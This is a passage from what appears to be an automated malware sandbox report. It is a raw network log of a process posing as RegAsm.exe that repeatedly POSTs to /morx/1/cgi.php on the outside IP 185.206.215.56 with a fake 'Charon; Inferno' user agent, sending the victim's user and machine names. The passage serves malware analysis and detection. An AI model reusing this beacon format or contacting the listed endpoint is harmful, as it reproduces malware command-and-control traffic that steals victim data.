                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:15.621453047 CET1169OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:15.734059095 CET1170INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        22192.168.2.2249189185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.960354090 CET1170OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.043039083 CET1171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:16.139384985 CET1171INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        23192.168.2.2249190185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:16.358508110 CET1172OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.433563948 CET1172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:16.531882048 CET1172INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        24192.168.2.2249191185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:16.795878887 CET1173OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.871017933 CET1173OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:16.967212915 CET1174INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        25192.168.2.2249192185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.183871031 CET1174OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:17.246232033 CET1175OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:17.344388008 CET1175INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        26192.168.2.2249193185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.566776991 CET1176OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:17.636620998 CET1176OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:17.726876020 CET1176INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        27192.168.2.2249194185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.949146032 CET1177OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.032426119 CET1177OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:18.134409904 CET1178INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        28192.168.2.2249195185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:18.364453077 CET1178OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.433459997 CET1179OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:18.531193972 CET1179INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        29192.168.2.2249196185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:18.788238049 CET1180OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.855551958 CET1180OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:18.959882975 CET1180INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        3192.168.2.2249170185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.473301888 CET1145OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:08.542748928 CET1146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:08.645122051 CET1146INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        30192.168.2.2249197185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.176156998 CET1181OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:19.246120930 CET1181OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:19.341244936 CET1182INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        31192.168.2.2249198185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.576040030 CET1182OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:19.652189016 CET1183OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:19.751715899 CET1183INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        32192.168.2.2249199185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.958724022 CET1184OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:20.027097940 CET1184OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:20.125689983 CET1184INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        33192.168.2.2249200185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:20.390921116 CET1185OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:20.466362000 CET1185OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:20.569029093 CET1186INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        34192.168.2.2249201185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:20.950520992 CET1186OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:21.027319908 CET1187OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:21.111865044 CET1187INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        35192.168.2.2249202185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:21.679579973 CET1188OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:21.746160984 CET1188OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:21.837781906 CET1188INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        36192.168.2.2249203185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:22.303822041 CET1189OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:22.371170998 CET1189OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:22.484252930 CET1190INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:21 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        37192.168.2.2249204185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:22.694391966 CET1190OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
